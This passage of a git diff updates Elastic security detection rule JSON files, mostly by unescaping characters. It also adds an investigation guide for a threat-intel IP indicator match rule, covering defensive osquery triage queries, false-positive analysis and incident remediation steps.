Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). 
Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). 
Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).",
 "query": "source.ip:* or destination.ip:*\n",
 "references": [
 "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html",
@@ -130,7 +130,7 @@
 ]
 }
 ],
- "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
+ "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
 "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e",
 "timeline_title": "Generic Threat Match Timeline",
 "type": "threat_match",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json
index 8a6e8aa15f6..ad4018241c6 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json
@@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel IP Address Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. 
\n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve 
Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). 
Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. 
When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path 
WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "source.ip:* or destination.ip:*\n",
 "references": [
 "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html",
@@ -130,7 +130,7 @@
 ]
 }
 ],
- "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
+ "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"",
 "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e",
 "timeline_title": "Generic Threat Match Timeline",
 "type": "threat_match",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json
index 1942c08b06a..41463b27269 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json
index 2158e87be66..a76b05572eb 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json
index 4bc62bbe290..fee7f2d7ea1 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json
index 597a191e98e..d1d5ed5b34f 100644
--- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json
index 6f173dff110..7a806b1732d 100644
--- a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json
index e858df7ae66..cfc79d0d0b8 100644
--- a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json
index 95ce36733f2..8d0a3626fde 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json
index 953c377edb0..2564230ea44 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json
index 8b1d385daff..6de56631cc5 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json
index 70aa32bd021..a3d41fb6c95 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json
index 4c101ad64cf..075e5cc37a6 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json
index 232c04119d9..0f1b9325f5a 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -87,7 +87,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json
index d55fd519fca..13ab427e846 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -86,7 +86,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json
index a0daf781a17..52903f737a5 100644
--- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json
@@ -78,7 +78,7 @@
 ],
